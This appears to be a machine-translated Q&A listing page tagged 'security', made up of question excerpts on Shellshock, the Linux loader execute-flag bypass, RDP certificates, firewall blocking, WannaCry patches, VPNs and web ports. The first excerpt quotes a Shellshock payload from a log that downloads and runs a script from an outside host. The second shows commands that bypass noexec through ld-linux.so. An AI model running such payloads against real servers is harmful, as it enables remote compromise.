Questions tagged «security»

保护计算机系统和信息免受诸如盗窃或破坏数据之类的威胁。


3
这是攻击还是值得关注的事情?炮弹冲击?
access.log在我的测试服务器上看到了: > 173.45.100.18 - - [26/Sep/2014:07:09:53 +0200] "GET /cgi-bin/hi HTTP/1.0" 404 490 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget > http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; > perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\"" 没有任何地址与我或我们的IP范围(或与此有关的任何其他内容)有关,立即考虑了Shellshock安全漏洞 /“ bashdoor”。 实际上,似乎有人尝试将curl“某物”降到服务器上,然后执行该“某物”,然后用删除了该“某物” -rf。 这是一个纯粹的测试服务器,没有造成任何危害(==除了重新安装之外没有任何危害)-但是时间安排非常有趣。据我回忆,以前从未见过这样的事情。 我应该担心,例如被“感兴趣”吗?有谁知道这是什么吗?

3
颠覆Linux系统上的execute标志。为什么会这样呢?
在阅读本文的同时,我发现了以下漏洞: % cp /usr/bin/id ~ % chmod -x ~/id % ls -al ~/id -rw-r--r-- 1 edd edd 22020 2012-08-01 15:06 /home/edd/id % ~/id zsh: permission denied: /home/edd/id % /lib/ld-linux.so.2 ~/id uid=1001(edd) gid=1001(edd) groups=1001(edd),1002(wheel) 此代码片段表明,我们可以像普通的非特权用户一样轻易地避开文件系统的执行权限。我在Ubuntu 12.04上运行它。 虽然Linux加载器是file(1)的共享对象,但它也具有允许直接执行的入口点。当以这种方式执行时,Linux加载程序将充当ELF二进制文件的解释器。 但是,在我的OpenBSD机器上,此利用无效,因为您可能未将加载程序作为程序执行。OpenBSD手册页显示:“ ld.so本身是一个共享对象,最初由内核加载。” 在Solaris 9上尝试此操作,您将遇到段错误。我不确定其他地方会发生什么。 因此,我的问题是: 为什么Linux加载器(直接执行时)在解释ELF二进制文件之前不检查文件系统属性? 为什么要实施一种机制,该机制被设计成不允许执行文件(如果它被轻易地绕开了)?我错过了什么吗?

10
在Dropbox中保留半敏感信息是否安全?
我不会相信Dropbox拥有我的银行详细信息之类的信息(因为有很多人在寻找这种信息),但是保留一些对少数人有价值的东西是否安全?例如,商业敏感信息,科学论文草稿,大学评估的答题纸(我辅导)等。 关于我可能会错过的隐私或已存储信息的所有权,细则中是否有任何相关内容? 只要我拥有一个相当安全的密码,知道我的电子邮件地址的人是否有可能破解它?


2
我的RDP服务器证书存储在哪里?
考虑到最近的中间人攻击问题,我实际上已经注意到连接到服务器时收到的警告: 选择查看证书,我要检查SHA1 指纹: 颁发给:corsair 颁发者:corsair 有效期从:2013/9/5 至 2014/3/7 指纹(SHA1):‎e9 c5 d7 17 95 95 fd ba 09 88 37 d8 9f 49 5e b8 02 ac 2b e2 并确保它与服务器上的内容匹配。我仍然连接,然后使用certmgr.msc,搜索证书(即“发给海盗船”): 它是机器上唯一的一个。但是等等,这不是相同的键: 我通过RDP提交的证书与服务器上的证书不同: 颁发给:corsair 颁发者:corsair 有效期从:2013/4/6 至 8/7/3012 指纹(SHA1):‎c5 b4 12 0d f6 4f b3 e7 a8 59 cd 4d e4 0e …



3
我是偏执狂,还是公司防火墙检查了整个国家?[关闭]
已关闭。这个问题需要更加集中。它当前不接受答案。 想改善这个问题吗?更新问题,使其仅通过编辑此帖子来关注一个问题。 2年前关闭。 最近,在过去的一年左右的时间里,我注意到到达某些地点的难度似乎越来越大,尤其是在伊朗或俄罗斯等非受惠国家的地点。 例如,刚才我试图访问俄罗斯国防部的网站(http://eng.mil.ru/en/index.htm),该网站具有与我业务相关的正当理由,并且它超时了。我通过欧洲代理人尝试了同一站点,并且连接没有问题。然后我尝试了一个tracert,这是结果: 我对此的解释是IP被公司防火墙阻止。我问我们的IT部门什么是网络的IP阻止策略,并被告知该策略不是由我们公司决定的,而是由防火墙服务提供商确定的,并且对提供商来说是“秘密和专有的”,并且它们(即IT)无法控制该政策。 这是什么故事?防火墙产品供应商是否只是在封锁整个国家? 我只是为了傻笑而决定尝试不同的国家,看看会发生什么: Finland ok Poland ok Russia blocked Ukraine blocked Estonia blocked Turkey blocked Saudi Arabia blocked Afghanistan ok Iraq blocked Georgia ok Armenia blocked Uzbekistan ok 好的,所以我可以访问乌兹别克斯坦和乔治亚州的网站,但不能访问亚美尼亚或乌克兰的网站?谁在制定这种逻辑?

4
如何检查是否安装了特定的Windows安全更新?
鉴于WannaCry勒索软件的利用正在蔓延,我想检查我的计算机是否具有应阻止该漏洞的特定安全更新-显然是MS17-010,假设我了解该漏洞,那的确是正确的补丁程序。一个人将如何检查这一细节? 微软试图提供一些细节,但是这对于那些不熟悉注册表项的人来说是胡说八道(我想我曾经接触过它们一次,以便在XP还是一回事的时候就挖掘出顽固的病毒-就是这样。)其他搜索也提供了一些线索命令行选项,但并不是很清楚,我不喜欢运行我不理解的命令。



3
代理和VPN有什么区别?
有几家服务提供商允许用户规避防火墙或匿名访问他们的Web。 其中一些使用代理,一些使用VPN。大多数人说,VPN通常比代理更有效。它们通常也更昂贵。 例如,代理将授予国际用户访问Pandora.com的权限,但不授予Hulu.com的访问权限。VPN会同时为两者工作。 代理与VPN的工作方式有何不同?为什么有所作为?
21 security  vpn  proxy 

5
conhost.exe的多个实例
我的桌面有两个实例 conhost.exe 在任何时候都在后台运行。一些谷歌搜索带来了一些文章, 像这个 ,但他们没有解释为什么我有多个实例 conhost 运行。我没有打开任何控制台窗口。 这是Process Explorer的截图: 我天生就很谨慎。在彻底安装Windows 7之后,我做的第一件事就是启动UAC,启动防病毒,防恶意软件和防火墙。我不能排除病毒,但它确实存在 高度 不太可能。 这里发生了什么事?什么是作为参数传递的大数字 conhost?

5
我应该在80、8080或81端口运行我的小型网站吗?
我正在使用nginx运行一个小型网站。由于在服务器的使用寿命中(可能)不会有大量流量,并且为了避免随机的DoS攻击,我正在考虑将Web服务器设置为侦听备用端口而不是端口80。 在备用端口(81、8080等)上侦听是否真的降低了我遭受攻击或破坏的风险?还是维护它的负担超过了收益?在那种情况下,我是否应该将那些备用端口用于其他Web服务,以防将来将来设置它们?

By using our site, you acknowledge that you have read and understand our Cookie Policy and Privacy Policy.
Licensed under cc by-sa 3.0 with attribution required.